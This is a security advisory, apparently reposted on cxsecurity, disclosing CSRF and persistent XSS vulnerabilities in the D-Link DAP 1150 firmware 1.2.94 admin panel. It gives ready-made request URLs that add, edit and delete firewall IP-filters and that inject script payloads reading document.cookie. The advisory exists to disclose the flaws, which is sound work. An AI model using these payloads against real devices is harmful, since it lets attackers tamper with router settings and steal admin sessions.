D-Link DAP 1150 Cross Site Request Forgery / Cross Site Scripting

2014.04.12
Credit: MustLive
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

Hello list! In 2011 and beginning of 2012 I wrote about multiple vulnerabilities (http://securityvulns.ru/docs27440.html, http://securityvulns.ru/docs27677.html, http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens). That time I wrote about vulnerabilities in admin panel in Access Point mode and now I'll write about holes in Router mode. I present new vulnerabilities in this device. There are multiple Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router). SecurityVulns ID: 12076. CSRF (WASC-09): In section Firewall / IP-filters via CSRF it's possible to add, edit and delete settings of IP-filters. Add: http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=-1 Edit: http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0 Delete: http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=88&res_pos=0 XSS (WASC-08): These are persistent XSS. The code will execute in section Firewall / IP-filters. Attack via add function in parameter res_buf (in fields: Name, IP Addresses Source, Destination, Ports Source, Destination). http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22portd%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ipd%22:%22192.168.1.2/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22}&res_pos=-1 Attack via edit function in parameter res_buf (in field Name, but not in other fields). http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0 Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link ignored all vulnerabilities in this device (as in other devices, which I informed them about) and still didn't fix them. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7095/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

References:

http://securityvulns.ru/docs27677.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top